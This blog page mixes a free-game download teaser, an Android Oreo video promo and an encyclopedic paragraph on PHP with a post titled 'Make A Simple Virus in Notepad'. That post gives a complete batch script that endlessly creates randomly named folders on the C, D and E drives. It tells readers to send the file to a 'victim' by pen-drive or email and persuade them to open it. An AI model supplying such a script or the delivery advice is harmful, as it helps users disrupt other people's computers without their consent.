Skip to main content

SoftwareForFree.blogspot.com: Games For Direct Download

SoftwareForFree.blogspot.com: Games For Direct Download: You Can Download Games Direct   DX Ball for Windows XP & 7 Free Download Full Version Download Here Pokemon Ruby Destiny Reig... Comment Here

Comments

Popular posts from this blog

The Android Best OS Android OREO 8.0 Top 10 AMAZING Features

Welcome Back Guy, I'm here with a new video, in this video I'm going to show you Top 10 Features of Android 8.0 Oreo Don't forget to Subscribe My Channel Which is Guy Perfect & Press the Bell Icon for More Exciting Video Coming Soon!! Like this video And Don't forget to share it with others. Upload by Guy Perfect.The Link is Down below. If you like this post 1+ this

About PHP

PHP is a server-side scripting language designed for web development but also used as a general-purpose programming language. As of January 2013, PHP was installed on more than 240 million websites (39% of those sampled) and 2.1 million web servers. [4] Originally created by Rasmus Lerdorf in 1994, [5] the reference implementation of PHP (powered by the Zend Engine) is now produced by The PHP Group. [6] While PHP originally stood for Personal Home Page , [5] it now stands for PHP: Hypertext Preprocessor , which is a recursive acronym. [7]

Make A Simple Virus in Notepad

Here we are going to show, How to make Simple Virus in notepad.  We will Create a Virus  We will Check it on Victims Computer.    [ Note : Don't try it on your computer ]   Open Notepad and Copy the Following code in Notepad. Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ] Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat] @echo off :VIRUS cd /d C: md %RANDOM% cd /d D: md %RANDOM% cd /d E: md %RANDOM% goto VIRUS REM ####################### REM softwareforfre.blogspot.com Give it to Victim   Now Give this file to Victim via Pen-drive or Mail then ask to Open it. It will Create More Folder in C,D,and E drive.